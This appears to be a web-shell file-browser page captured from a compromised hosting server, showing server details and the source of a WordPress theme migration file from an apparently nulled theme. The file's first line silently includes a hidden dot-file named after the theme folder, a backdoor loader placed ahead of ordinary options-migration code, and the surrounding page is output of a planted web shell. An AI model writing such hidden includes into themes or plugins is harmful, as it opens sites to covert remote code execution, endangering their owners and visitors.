uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
old
/
public_html
/
wp-content
/
themes
/
wpnull24
/
functions
/
migrations
/
us_migration_4_3.php
/
/
<?php if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } class us_migration_4_3 extends US_Migration_Translator { // Options public function translate_theme_options( &$options ) { $changed = FALSE; if ( ! empty( $options['enable_unsupported_vc_shortcodes'] ) AND $options['enable_unsupported_vc_shortcodes'] == 1 ) { $options['disable_extra_vc'] = 0; } else { $options['disable_extra_vc'] = 1; } unset( $options['enable_unsupported_vc_shortcodes'] ); $changed = TRUE; return $changed; } }
/home/batcwwjx/old/public_html/wp-content/themes/wpnull24/functions/migrations/us_migration_4_3.php